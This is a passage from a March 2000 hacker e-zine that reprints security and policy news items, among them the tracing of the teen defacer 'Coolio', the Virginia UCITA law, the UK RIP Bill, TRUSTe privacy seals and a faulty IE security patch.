fight is not over.

2600 <see elsewhere this issue>
http://www.2600.com/news/2000/0312.html

Open DVD
http://www.opendvd.org/

@HWA

19.0 HNN:Mar 14th:Tracking Down Coolio
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Carlos
Log file analysis and a search engine, those where the
most complicated tools needed to track down Coolio
(Dennis Moran). Coolio was charged last week with
defacing the Dare.org web site. (And this is what the
FBI wants all that extra money for?)

Associated Press - via ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/coolio000313.html


On the Trail of a Hacker


Court Papers Reveal How Cyber Gumshoe Tracked Teen Dennis Moran, 17,
who goes by the name "Coolio" on the Internet, talks with reporters
March 8, near his Wolfeboro, N.H., home after being questioned by
the FBI about crippling attacks on major Web sites in February.

(Ken Williams/Concord Monitor/AP Photo)
http://www.abcnews.go.com/media/Tech/images/ap_hacker_000313_h.jpg


The Associated Press

W O L F E B O R O, N.H., March 13 Recently
released court records explain how authorities
traced the hacking attack on a popular anti-drug
Web site to a Wolfeboro teenager.
Dennis Moran, 17, was charged last week with hacking
into the Web site of DARE.org and defacing it with
pro-drug abuse slogans and images.
He has acknowledged he vandalized the Los
Angeles-based site and two others, but said he was only
joking when he claimed responsibility for the attacks that
crippled Yahoo, eBay and other major sites last month.
Court records released Friday show police began
investigating Moran after noticing his Internet nickname,
Coolio, on the defaced DARE.org site in November.

At the bottom of the Web site were the messages
Coolio is k-r4d and so are drugs and Craftily owned
by Coolio :D.

Searching in Cyberspace
Los Angeles Police Detective Michael Brausman used a
search engine to find a Web page that included an e-mail
address for Cooliok-r4d.com. He traced the address to
another site that included a directory labeled Coolio.
Inside the directory was one of the images posted on the
DARE site.

By late December, the detective had contacted the
owner of an Arizona-based server who confirmed he had
e-mail messages related to the Coolio directory. A search
of the server’s logs showed someone using the e-mail
address cooliok-r4d.com had sent messages that included
Moran’s name, address and phone number.

In one message, Moran inquired about registering
cool.io as an Internet domain name.

If there’s any way I could buy the domain for this,
please email me pricing and information. Thanks, Dennis
Moran, he wrote.

Brausman called Wolfeboro police Dec. 30.
Investigators interviewed Moran on Feb. 17.
Moran faces two state charges of unauthorized access
to a computer system. Each felony is punishable by up to
15 years in prison and a $4,000 fine.

Although Moran also was questioned by the FBI
about several denial of service attacks on major
commercial sites, including Yahoo.com and eBbay.com,
no charges have been filed in those cases.

Investigators said they were seeking someone using the
Internet signer Coolio in those attacks, but also said the
name is used by many people online.

@HWA

20.0 HNN:Mar 14th: DOJ Launches Cybercrime Site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The US Department of Justice has officially launched a
cybercrime web site defining computer crime and
describing how to report it. The site also includes
department's latest thinking on privacy vs. policing on
the Internet as well as computer search and seizure
guidelines.

Associated Press - via Nando Times
http://www.techserver.com/noframes/story/0,2294,500180192-500237416-501173875-0,00.html
(Sorry dead link ... -Ed :( )


Cybercrime.gov
http://www.cybercrime.gov/

@HWA

21.0 HNN:Mar 14th: China Relaxes Crypto Rules
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acoplayse
After pressure from the US-China Business Council
Chinese authorities have agreed to "clarify" encryption
regulations that where published in October last year.
the State Encryption Management Commission (SEMC),
which reports to the Ministry of State Security, has said
that only hardware or software for which encryption is a
core function will be limited by the regulations. products
that contain encryption as a secondary function will no
longer be restricted. This includes browsers, consumer
electronics and other items.

Financial Times
http://news.ft.com/ft/gx.cgi/ftc?pagename=View&c=Article&cid=FT3ZAN1CS5C&
live=true&useoverridetemplate=ZZZFKOXOA0C&tagid=ZZZC00L1B0C&subheading=
information%20technology&_ref=526610871

China softens rules on encryption
By James Kynge - 13 Mar 2000 22:06GMT

China has backed away from sweeping restrictions on the use and sale of foreign
encryption technology that would have wreaked havoc on the use of foreign
software, mobile phones, e-mail and other communications applications.

The US-China Business Council, which led a lobbying effort that united several
national chambers of commerce in Beijing, said on Monday that Chinese
authorities had agreed to "clarify" encryption regulations published in October last
year.

The main sense of the clarification was that only hardware or software for which
encryption is a core function will be limited by the regulations of the State
Encryption Management Commission (SEMC), a body that reports to China's
intelligence agency, the Ministry of State Security.

This means that mobile phone handsets, windows software, browser software
and other applications that contain encryption as an ancillary function will not now
be restricted.

Windows 2000, Microsoft Corp's newest operating system, which is set to be
launched in China on March 20, was given approval for sale this month by
authorities, prefiguring the relaxation in SEMC's rules.

It was not immediately clear what types of products would fall under the definition
of having encryption as a core function. Under the SEMC's original restrictions, all
businesses and individuals would have had to register with the government any
products containing encryption technology.

They then would have had to apply for permission to use the goods.

But a clarification letter issued by the SEMC allayed fears the government would
gain access to corporate secrets carried in encoded communications by requiring
companies to hand over their encryption source codes.

Business travellers carrying laptops with ordinary software, even if it contains
some encryption capabilities, are not required to register, the US-China Business
Council quoted the SEMC as saying in a verbal clarification of the regulations.

@HWA

22.0 HNN:Mar 14th:Stallman on UCITA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by Weld Pond
The Uniform Computer Information Transaction Act will
threaten the existence of free software if passed.
Richard Stallman the founder of the Free Software
Foundation has spoken out vehemently about this
legislation and continues to do so.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2457092,00.html

Interview: GNU guru Richard Stallman

The president of the Free Software Foundation and founder of the
free-software movement speaks out against UCITA.



By Robert Lemos, ZDNet News March 12, 2000 3:44 PM PT


When Richard Stallman founded the GNU (or Gnu's Not
Unix) Project in 1984, his aim was to create
Unix-compatible tools that were free. Sixteen years
later, GNU software is a critical part of most Unix
systems and forms the basis -- along with Linus
Torvalds' Linux kernel -- of all Linux systems.

With the proposed Uniform Computer Information Transaction Act
(UCITA) threatening the free-software movement, ZDNet News Senior Editor
Robert Lemos caught up with Stallman, president of the Free Software
Foundation, in India.

ZDNet: What will be the effect of UCITA on the free software
movement?

Stallman: UCITA would make it harder for us to avoid liability for
bugs that turn up in the free software we develop -- while giving
proprietary software developers a very easy way to avoid all liability for
their products, even for faults that they know about in advance. This is
grossly unfair.

UCITA would also give proprietary software developers a way to
prohibit reverse engineering. They could then promulgate secret formats
for distributing and storing data and stop us from implementing free
software to handle those formats. We would be unable to provide you with
software to access your own data.

ZDNet: What will be the effect on GNU development? What about
GNU/Linux?

Stallman: I don't expect UCITA to have any immediate effect on our
software development. But in the long term we will probably have trouble
making our software handle the secret data formats and support new
hardware whose specifications are secret.

Microsoft already said they plan to use secret formats and protocols
to block the development of (GNU/) Linux. The format of Word is already a
secret, and it is only through reverse engineering that people can figure
out anything about it.

ZDNet: Will software be worse because of UCITA?

Stallman: That is the wrong question. The right question is how will
users of software be worse off because of UCITA?

I've already explained the problems free software will face. We will
face additional obstacles to doing a good job. For non-free software,
developers will not face additional obstacles, but they will be able to
restrict the users in onerous ways. So even if the software is unchanged,
the users will be worse off.

For example, the owners will be able to change the software license
at any time, restricting what you are allowed to do with a program. They
will be able to send you e-mail containing new conditions, and these new
conditions will be legally binding on you even if you never actually got
the mail.

If you do see the mail and you reject the new conditions, they will
be able to demand that you stop using the program -- and even send your
machine a message across the network to turn off the program without a
moment's notice.

ZDNet: If there is so much opposition, why has the BSA, and others,
had so much success in pushing the bill through?

Stallman: As far as I know, they have succeeded in one state. The
term "so much success" seems to be an exaggeration.

I don't know why they succeeded in Virginia; I can only guess. But
here are some things, which are not unusual, which may have happened this
time:

1.The supporters of UCITA probably are better organized and
have more money to contribute to election campaigns.

2.The legislators probably have not actually read UCITA, and
that enabled supporters of UCITA to mislead them about both what UCITA
would do and why people oppose it.

3.The supporters of UCITA probably told the legislators ...
that if Virginia passes UCITA and other states do not, some software
companies will move to Virginia.

State legislators and governors often give an unreasonable amount of
emphasis to winning business to their states from other states. They often
do this without regard to whether the country as a whole will benefit or
suffer as a result. Business often uses this to manipulate states, to play
one state against another, to get what it wants.

The joke, though, is on them, because only retail Internet sites
would move to Virginia, and the total employment of these sites would be
insignificant. The software
development will remain where it is, in California,
Washington, Bangalore or wherever.


(Sorry about formatting, couldn't be bothered to pretty it up ... - Ed)

@HWA



23.0 HNN:Mar 14th:What Exactly Does TRUSTe Mean Anyway?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The industry trade group TRUSTe was formed in an
effort at self regulation and to help fend off unwanted
legislation. Are they really doing the public a service? An
interview with TRUSTe CEO Bob Lewin details how even
sites selling personal data can acquire the privacy seal
of approval.

Salon
http://www.salon.com/tech/view/2000/03/13/truste/index.html

The privacy police?
TRUSTe CEO Bob Lewin explains how even sites selling
personal data can get the nonprofit's privacy seal of approval.

- - - - - - - - - - - -
By Lydia Lee

March 13, 2000 | When TRUSTe launched in
1996, the nonprofit promised to help the Internet
industry regulate itself with regard to protecting
surfers' privacy. Over the past three years, it has
vetted the privacy policies of over 1,300 sites, and its
black-and-green logo, which signals to visitors that a site actually
abides by its policies, can be found on most major e-commerce
sites. But what kind of teeth does the organization really have?

TRUSTe didn't look so trusty last year when a security expert
found that its licensee RealNetworks had been collecting user
information on the sly. Instead of reprimanding the company, the
nonprofit argued that because RealNetworks' privacy violations
took place via its RealJukebox software, not its Web site, the
incident was outside the purview of TRUSTe. More recently, it's
been other privacy advocacy groups like JunkBusters that have
alerted the public to privacy violations such as Intel's decision to
include an identifier in its Pentium III chip; JunkBusters also
started a campaign against DoubleClick's acquistion of Abacus
when it was announced last June.

But Bob Lewin, executive director and CEO of TRUSTe, says
the group's privacy seal program plays an important role in
enforcing privacy policies. Previously, Lewin was vice president
of marketing at networking software company ISOCOR and
before that at the open systems consortium X/Open Company.
Now he heads up this nonprofit that charges between $300 and
$4,999 to certify an e-commcerce site's privacy practices.

What's the basic message you're giving to consumers when
they see the TRUSTe symbol? Is it that the site isn't going
to sell my data?

The bottom line is that this site adheres to the fair information
practices -- that they are disclosing what information they're
collecting, why and if they're sharing that information with
somebody. No 2: that they're giving the visitor the choice --
whether to allow that to happen; 3) that once the information is
collected, they will use reasonable security to protect that
information; 4) that they allow the consumer reasonable access to
that information to modify it.

So if I were collecting consumers' e-mail addresses and
then selling them to a direct-marketing company, would I
still be able to get the TRUSTe symbol?

Only if you stated that to the consumer in your privacy statement.
If somebody came to us and said, "Here's our privacy statement.
We will collect the e-mail addresses, and it's our intent to sell or
share this information with these third parties, and we are giving
you the option to say yes or no to this." Then that site could
become a TRUSTe licensee.

What percentage of sites get rejected?

It's not a large percentage -- I'd guess 1 to 2 percent.

What's the major reason sites get rejected?

Once they start through the process, they can't or will not meet
the requirements of the program. Say they'd like to be able to
share info with a subsidiary, and we say, "That's to a third party,
you have to disclose that." Well, they may voluntarily decide
they're not going to proceed. Also, we don't apply our mark to
gambling sites, since it's illegal in some states. The other reason
that it happens, frankly, is that 85 percent of our sites are very
small -- $10 million and below --- and as the process starts, the
company goes out of business.

If DoubleClick had been a TRUSTe member, would its
decision to combine its database of anonymous surfing
habits with an acquired database of personal information
have set off red flags for you?

There would be some issues. That's why we formed a third-party
ad server committee, to get all the technical and legal issues out
on the table.

They would have had to inform us before they changed their
policy, and we would have had some discussions.

Once it has the TRUSTe seal, have you ever kicked out a
site for doing something?

No, we've come very close, but we haven't had to do it. The
escalation process is as follows: We get a complaint from a
consumer about a licensee, and once we are assured that the
consumer had previously contacted the Web site to try and get it
resolved -- because a lot of these are just misunderstandings --
we then contact the Web site and investigate and find out indeed
if there's a real issue here. Now, the resolution to this may result
in a change in the privacy policy, the business model, or what
have you.

Shouldn't you have caught that kind of stuff when you
reviewed the policy in the first place?

Well yes, but the nature of the beast is that all of this is software.
What is generally the case is that there's been some unplanned
feature in the software. Something will happen -- not that
somebody wanted to do it, but the software allowed them to do
it. So, when it happens, you point it out, it gets fixed and it's over.

But that shouldn't mean they need to change their privacy
policy, should it?

It could be just a software change, but it could be a policy
change. Let's say you implement software that shares information,
or decide to collect more info than you originally stated --
perhaps you're collecting IP addresses, or disseminating cookies.
So you have to change your policy. This whole thing is not a static
field. We do constant monitoring, but many of our licensees will
communicate with us, and in fact one-third of our efforts is
focused on working with them. As their Web sites evolve, we've
got to ensure that the privacy statement evolves. It's an ongoing
process.

Would it be incumbent on the company to notify all the
users who had seen the previous privacy policy?

If they start collecting new information, then at that point in time,
they have to communicate to users from this point forward, "We
are also doing this." So that has to be stated clearly in the privacy
statement. It would not impact people from beforehand because
that information was not being collected.

But what if the people from beforehand come back and then
they don't read the privacy policy? Is there anything in the
TRUSTe program that says if you are instituting a new
privacy policy, you have to let all the consumers from
before know that?

Well, we can't force consumers to read privacy statements, but in
all our consumer outreach programs, we tell people: Even if
you've visited this site before -- because things change -- the first
thing to do is go to the privacy statement and review it to make
sure there have been no changes. And we encourage licensees to
put any changes up at the front. This is easier said than done --
none of us like to read pages and pages of text.

Have you ever blown the whistle on a company?

Yes, there are instances -- most of the problems are not with
malice aforethought. The major monitoring is by consumers
themselves, but we have people who look at the sites every
quarter, to see if there've been any changes on the site. We also
enter in names that we make up, opt-in in some cases and
opt-out in others, so if we get communication to a name then we
know where it came from.

What role should the government have in enforcing online
privacy?

They play a very important role now, because they conduct
studies on whether improvement has occurred within the industry
-- the number of privacy statements, the quality of privacy
statements. I think the government has clearly stated that certainly
in the health-care and financial area, they feel the need to have
some kind of legislation. They also did that for children --the
Children's Online Privacy Protection Act. They've said that
because this is super-sensitive information, you should have some
guidelines.

Now, the question becomes, what vehicle do you use to enforce
that legislation, which is equally important. We feel that seal
programs -- and in particular, TRUSTe -- play a very important
part there. COPPA is going into law April 21, and our contract
will contain the elements for Web sites to adhere to COPPA
requirements.

But it seems like a lot for any one company to keep up
with. With all these violations going on, it seems like there
needs to be a more watchful eye.

I would say that there is a watchful eye, if people look at the facts
versus hype from some advocacy groups. It's all very well to run
around screaming and yelling, "The sky is falling, the sky is
falling," but the fact is, many of these issues that have come up are
evolutions that occur in business models on the site. I would argue
that the industry has demonstrated very quick response when
those problems come up.

Take RealNetworks. The issue there occurred outside the scope
of the current TRUSTe program. Yes, Real Networks is a
TRUSTe licensee, but this particular issue had nothing to do with
the collection of personal information on the Web site; it had to
do with the collection of user information using software servers.
Now, within a week, even though it was outside the program, we
announced the formation of a pilot to evolve our program to
handle those situations. I defy any government agency to do that.

But customers aren't thinking, when they see the TRUSTe
symbol, that it only covers the Web site. Maybe from the
technical view it's different, but the consumer isn't going to
make the distinction. Does the TRUSTe program cover
both now?

Yes, we need to do a better job so the consumer intuitively
knows what the TRUSTe logo stands for. Ultimately, it would be
great -- as we lay out the software privacy program -- to blend
the two programs together. Or there may be a TRUSTe symbol
for sites and one for software.

What privacy issues are you trying to anticipate?

One thing we're looking at is the wireless world, where we start
talking about palm-held things and hand-held things and phones. I
think there are some issues there we haven't fully addressed yet.
We need to add more meat to the term "reasonable security."
Today, that's the best term people have, because it can vary so
much depending on the application and the technology. As we put
more and more of these things into people's hands, we have to
worry about how we prove that the person holding it is indeed the
proper owner.
salon.com | March 13, 2000

- - - - - - - - - - - -

About the writer
Lydia Lee is an associate editor for Salon
Technology.

@HWA


24.0 HNN:Mar 15th:UCITA Sign By Governor in Virginia
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by techs
Set to take effect in July 2001 the Uniform Computer
Information Transaction Act has been signed into law in
Virginia by Governor James S. Gilmore III. UCITA will
allow software companies to remotely disable software
and will giving licensing agreements the force of law.

Washington Post
http://www.washingtonpost.com/wp-dyn/articles/A6866-2000Mar14.html

Computer World
http://www.computerworld.com/home/print.nsf/all/000314F772

Post;

Gilmore Signs 1st Internet Commercial Code Into Law
By Craig Timberg
Washington Post Staff Writer
Tuesday, March 14, 2000; 1:00 PM

Virginia Gov. James S. Gilmore III signed the nation's first set of
contractual rules specifically governing electronic commerce into law
today on the second day of an Internet summit at George Mason University.

The Uniform Computer Information Transaction Act, which is typically
called by its initials "UCITA," overwhelmingly passed the General
Assembly during the just-finished legislative session despite the
opposition of critics who contended it would erode basic consumer
rights. Because of that continuing debate, the law will not take
effect until July 2001 while lawmakers study the fine print.

Supporters such as Gilmore (R) say UCITA mainly updates for the
Information Age the commercial codes that states passed decades ago.
UCITA essentially gives the force of law to software licensing
agreements as soon as a consumer rips the shrink-wrap off the box or
hits the "I Accept" button on a program downloaded from the Internet.

"UCITA provides clarity to contract law where none existed before,
whichwill make it easier for consumers and industries to conduct
transactions viathe Internet," Gilmore said in a statement. "This
increase in electronic transactions will perpetuate the Internet
revolution, promote e-commerce and foster the growth of Virginia's
technology and manufacturing economies."

State officials hope that by becoming the first state to adopt
UCITA, Virginia will further its reputation as a center of
high-technology and attract more businesses to the state.

But consumer advocates warn that in the rush to adopt UCITA,
Virginia overlooked concerns that have caused two dozen attorneys
general around the country, including Maryland's J. Joseph Curran Jr.
(D) to write a letter voicing concerns.

Consumer groups warn that UCITA will give software companies new
power to disable or "reposses" their products if they believe they
are being used in a way that violates the licensing agreement.
Another worry, say consumer advocates, is that buyers won't always
know the details of the licensing agreements until after the purchase
is made.

"The whole idea of informed shopping is based on disclosure before
purchase," said Jean Ann Fox of the Virginia Citizens Consumer
Council, which lobbied against the bill.

The signing took place at The 2000 Global Internet Summit at
George Mason's campus in Fairfax.

(c) 2000 The Washington Post Company

-=-

Computer World;

Va. governor signs UCITA legislation into law

By Patrick Thibodeau

03/14/2000 Fairfax, Va. — Flanked by the chairman of one
of the state's largest businesses — America Online
Inc.'s Steve Case — Virginia Gov. James Gilmore today
signed the Uniform Computer Information Transactions
Act (UCITA) into law.

But the bill won't take effect until July 2001, giving
people and businesses with concerns about UCITA time
to seek legislative amendments, the governor said.

"We're not deaf to people's concerns," said Gilmore.
Still, Gilmore said he doesn't believe those concerns
were "legitimate impediments" to the state's adoption
of the legislation.

The year-delay for adoption came at the behest of a
coalition of some of the state's largest nontechnology
companies, who believe UCITA gives software vendors
the upper hand in software licensing (see story).

"If there's any sense that things may not be quite right,
there is plenty of time for people to come in under
Virginia's approach and have a chance to do some
amendments," said Gilmore. The state plans to create a
study committee to examine the issues raised by the
business coalition that sought to delay the law's
implementation.

UCITA sets a series of default rules governing
commercial software transactions. One of its most
controversial provisions would allow a software vendor
to automatically disable software in a contract dispute.

Case praised Virginia's action and said he hoped "other
states will look at this and learn from this and embrace
it."

Virginia is moving quickly on UCITA to help create an
attractive climate for its technology businesses. For
UCITA to become the law of the land, technically it
must be adopted by 50 states. But companies may
nonetheless cite UCITA in their license agreements. "If
Virginia remains the only state that adopts this, then I
believe that the certainty of our (actions) would attract
additional businesses into the commonwealth," said
Gilmore.

Maryland is also actively considering the legislation.

@HWA


25.0 HNN:Mar 15th:RIP Goes Before Commons Today
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Lady Sharrow
The UK Government's Regulatory Investigatory Powers
(RIP) Bill goes before Select Committee in the House of
Commons today and in a little more than six months it
could be enshrined in law. The bill will force ISPs to
have the facilities to log and monitor all online activities
of their users.

The Register UK
http://www.theregister.co.uk/000314-000016.html


Posted 14/03/2000 11:37am by Sean Fleming

What the hell is... the UK's RIP Bill

The UK Government's Regulatory Investigatory Powers (RIP) Bill goes before Select
Committee in the House of Commons today and in a little more than six months it
could be enshrined in law. But with 30 amendments tabled against it and an angry
mob of opponents waiting to string it up, RIP has become better known for the
widespread - and some might say kneejerk - reaction people have had to it, rather
than for its aims and content.

Civil liberties groups, individual Net users and politicians from all the major UK parties
are banding together to decry what is being labelled a Snoopers Charter. But just
what is all the fuss about? The Blair administration has been slammed by many for its
cronyism and control freakery, so is this just another example of Big Brother Blair
wanting to watch over you at all times?

Growing pains
To become an accepted part of everyday life, and not just the place to go for
cyberporn, e-fraud and to pick up your email, the Internet will have to appeal to a
broader cross-section of the general public. Ecommerce, for example, will never thrive
in a world where the majority of potential users and customers are too scared to part
with their credit card details in case they get ripped off. The not-so-wired public need
to feel confident about the Internet. This is all part of the natural evolution that all things
go through when they achieve popularity. The days of the WWW Wild West are
numbered.

So, what does the Bill propose and why are so many people objecting to it. The Bill
describes itself as: "A Bill to make provision for and about the interception of
communications, the acquisition and disclosure of data relating to communications,
the carrying out of surveillance, the use of covert human intelligence sources and
the acquisition of the means by which electronic data protected by encryption or
passwords may be decrypted or accessed; to provide for the establishment of a
tribunal with jurisdiction in relation to those matters, to entries on and interferences
with property or with wireless telegraphy and to the carrying out of their functions by
the Security Service, the Secret Intelligence Service and the Government
Communications Headquarters; and for connected purposes."

Lots of spooky terms in there - "covert human intelligence sources" translates as
spies - but in essence this is all about setting down a legal framework within which
electronic communications are treated no differently from telephone tapping and
intercepting mail (as in the paper stuff). Some people will throw their hands in the air
at the very thought of any this but cracking down on the illegal use of the Internet by
terrorists, perverts and organised criminals may be considered by many to be A Good
Thing.

One size fits all
However, the Bill falls down - and in a big way - in the details. Or lack of them. It is
vague on practicalities, and how permission to access private communication will be
granted. ISPs will be obliged by law to have the facilities to log and monitor all the
online activities of their users. But the Bill doesn't specify how this will be done.
And while there is talk of the Government reimbursing hardware costs with regard to
monitoring, it doesn't make provision for the massive increase in overheads this will
bring.

The Bill is also very vague in parts and can be interpreted in such a way that much of it
becomes nonsensical. For example, it defines who will be covered by the Bill when it
becomes law: "a person who provides a postal service, or b) a person who provides
a public telecommunications service, or c) a person not falling within paragraph b)
who has control of the whole or any part of a telecommunications system located
wholly or partly in the UK."

ISPs, mobile phone companies, WAP service providers, news servers and so on all
fall under the term "telecommunications service". Look at that definition again - it
could mean anyone.

One of the Bill's fiercest critics is the organisation Stand. This is what Stand has to
say on this point: "You're no longer using an ISP to connect to the Net. You're using the
ISP's public telecommunication system."

The Bill also makes it an offence for you to be told that a surveillance warrant has ever
been issued against you. That offence exists in perpetuity - there is no expiry date, you
can never be told. And should anyone ever tell you they risk a prison sentence.

Someone to watch over me
Ah yes, you may be thinking, I live in a liberal democracy - the security forces can't just
go round snooping on people willy nilly. Well, guess again. Here's what the Bill says
about surveillance warrants. There are four main justifications given by the bill for
issuing a warrant:
a) national security interests,
b) to prevent or detect serious crime,
c) to safeguard the UK's economic well being
d) for the purpose, in circumstances appearing to the Secretary of State to be
equivalent to those in which he would issue a warrant by virtue of paragraph (b), of
giving effect to the provisions of any international mutual assistance agreement.

And there's a list as long as your arm of those people who can issue the warrant
against you - from senior police officers to "any such other personas the Secretary of
State may by order designate".

Reading between the lines, the Bill says that the Home Secretary can - for any reason
- issue a warrant against anyone, and that anyone with the Home Secretary's
permission can do likewise. Don't forget, you'll never know if information has been
gathered about you, what it was used for and so on.

Taking Liberties
As it stands, reader Simon Batistoni writes , The RIP Bill contains one truly frightening
basic assumption: if you have stored on your computer any form of encrypted
message, you will be forced on request by the police to hand over the necessary keys
t decrypt this data. If you do not have the keys, YOU MUST PROVE THAT YOU
HAVE NEVER BEEN IN POSSESSION OF THEM, or you could be subject to a
two-year jail term.

The principle of the police being able to view encrypted data, so that they can nail
paedophiles, drug dealers, etc, has some genuine merits.

The flaw in this measure, however, is that the recipient/possessor of encrypted data is
guilty, until proven innocent, something which destroys the entire foundation of our
legal system. What's more, it is impossible to prove that you never had something.

As it stands, the measures in the Bill could be applied to a PGP-encrypted signature
on an email, currently used by many as a reliable means of identity verification.

Theoretically, the innocent father of a suspect under
surveillance, who receives an email from his son containing the standard encrypted
signature, could fall under the scope of this RIP Bill; he could be jailed for failing to
reveal the contents of the encrypted data.

Ostriches need not apply
Small wonder that there is so much opposition to the Bill. There are many more
examples of the above thinking running throughout the Bill, such as the loophole that
could mean you have to keep tabs on yourself but can never let yourself know,
otherwise you end up in prison. Stand has done a much more comprehensive job of
examining RIP than The Register is able to do and its site is well worth a visit.

Don't be fooled into thinking that your Government will always have your best interests
at heart, because that's not the way of Governments. But at the same time, don't
assume that any attempt to regulate the Internet is an invasion of rights and freedoms -
freedom without responsibility is, after all, little more than latent tyranny. We will all be
affected by the RIP Bill when it becomes law - as it almost certainly will, in some form
or another - so now is the time to find out a little more about it and decide where you
stand, because in another six months it could all be too late. ®




@HWA

26.0 HNN:Mar 15th:Security Patch Locks Out Users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse
A a 128-bit security patch for Internet Explorer 5.0,
5.0a, and 5.0b released by Microsoft will replace
security files with older versions that will lock users out
of their systems after restart. Microsoft has asked
administrators to stop distributing the patch and has
said that a fix will be available soon.

InfoWorld
http://www.infoworld.com/articles/en/xml/00/03/14/000314enpatch.xml

IE5/Windows 2000 security patch can lock out users

By Cynthia Morgan, Computerworld

MICROSOFT WARNED NETWORK administrators on Monday to stop distributing a
security patch for Internet Explorer 5.0 that could prevent Windows 2000
users from logging in to their computers.

Instructions included with the patch, a 128-bit security add-on for
Internet Explorer 5.0, 5.0a, and 5.0b versions, are incorrect, said a
Microsoft spokesman. The error, a command-line "switch," causes an
automated installation to replace security files with older versions that
will lock users out of their systems after restart. The 128-bit security
installations under Windows 9x and Windows NT 4.x are not affected, the
spokesman added.

Administrators who have built automated installation packages for Internet
Explorer 5.0 on Windows 2000 systems should check the Microsoft site for
information on correcting the problem. Meanwhile, installation packages
containing the faulty switch should be frozen immediately.

A Microsoft KnowledgeBase bulletin (#Q255669) with complete instructions
and updates should be available at search.support.microsoft.com/kb within
24 hours, the spokesman said.

Microsoft Corp., in Redmond, Wash., is at www.microsoft.com

For more enterprise computing news, go to www.computerworld.com. Copyright
(C) 2000 Computerworld, Inc. All rights reserved.


@HWA


27.0 HNN:Mar 15th:DNA Used for Steganography
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by Dan
17-year-old Romanian-born Viviana Risca topped the
59th Intel Science Talent Search competition by
embedding a computer message in the gene sequence
of a strand of DNA using steganography, a data
encryption technology that allows a computer user to
hide a file within another file.

San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/merc/docs/013955.htm

What you're doing right now? Don't worry, it's totally normal.


Posted at 7:51 a.m. PST Tuesday, March 14, 2000

New York teen-ager win $100,000 with encryption research WASHINGTON (AP) -- A
17-year-old Romanian-born girl who embedded a computer message in the gene
sequence of a strand of DNA has been named the best young scientist in the
country.

Viviana Risca, a senior at Paul D. Schreiber High School in Port Washington,
N.Y., won a $100,000 college scholarship when she bested 10 other high school
seniors on Monday in the 59th Intel Science Talent Search competition.

Risca said her project in steganography, a data encryption technology that
allows a computer user to hide a file within another file, was a simple one.
Risca, who emigrated from Romania eight years ago, embedded the secret message
``June 6 Invasion: Normandy.''

Technologies like steganography can protect sensitive electronic information
from interception or eavesdropping, but they can also wreak havoc if used by
terrorists and criminals.

Formerly known as the Westinghouse Science Talent Search, the contest has been
nicknamed the ``Junior Nobel Prize.'' Past winners include five Nobel laureates,
nine MacArthur Foundation fellows and two Fields medalists.

Forty finalists came here to compete for the award.

Jayce Getz, a senior at Big Sky High School in Missoula, Mont., won second prize
and a $75,000 scholarship for a math project on partition function. And Feng
Zhang, a senior at Theodore Roosevelt High School in Des Moines, Iowa, won third
prize and a $50,000 scholarship for a biochemistry project in molecular
virology.

The other winners in the top 10, their schools, the amounts of their
scholarships and their projects were: Alexander Schwartz, Radnor (Pa.) High
School, $25,000, abstract algebra concerning Abelian groups; Eugene Simuni, 18,
Midwood High School in Brooklyn, N.Y., $25,000, a biochemistry project that
investigated G proteins; Matthew Reece, duPont Manual Magnet High School,
Louisville, Ky., $25,000, a proposal on fluid dynamics problems; Kerry Ann
Geiler, 17, Massapequa (N.Y.) High School,$20,000 for a project on communication
by ants; Elizabeth Williams, Palos Verdes Peninsula High School, Rolling Hills
Estates, Calif., $20,000, perception of light and shape by the brain; Zachary
Cohn, 17, Half Hollow Hills East High School in Dix Hills, N.Y., $20,000 for a
study of perfect squares; Bob Cherng, Troy High School, Fullerton, Calif.,
$20,000, the transition of ammonia and hydrogen halide into ammonium halide.

The other 30 finalists received $5,000 scholarships.

@HWA


28.0 HNN:Mar 15th:Bugging SAT Phones
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by Odin
A lot of people have turned to satellite phones as a last
ditch effort to retain some privacy. Now Motorola has
patented a means by which to listen in to a satellite
phone to satellite phone call.

New Scientist
http://www.newscientist.com/news/news_222923.html
(sorry: 404! - Ed)

@HWA


29.0 HNN:Mar 15th:More and more EZines
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by L33t Dawg
New issues of several e-zines have been released
including, Hack In The Box Issue #3, HWA Haxor news
#51 and Datacore has released DataZine 0.02.

Hack In The Box Issue #3
http://www.hackinthebox.org

HWA.hax0r.news
You're here already :-)

DataZine .02
http://www.tdcore.com/index2.html

@HWA

30.0 HNN:Mar 16th:Army on Alert Over CyberAttack Fear
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The Army has placed all of its worldwide cyber defense teams on full
alert after learning of a threat from a group known as The Boys From
Brazil. The group has threatened to deface the army.mil home page.
The Army has said that it is aware of the group's or attack profile,
and is prepared for any attack against the Army's Web site and that
they have enacted additional 'countermeasures' to protect the site.
(Is there really a threat? Who knows, but this sounds like one hell
of a publicity stunt.)

Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0313/web-armyhac-03-15-00.asp

Army on hacker alert

BY Dan Verton
Updated 03/16/2000 at 17:05 EST

HOUSTON — The Army has placed its cyberdefense teams on full alert after a known
hacker group threatened to take down the Army's World Wide Web home page this
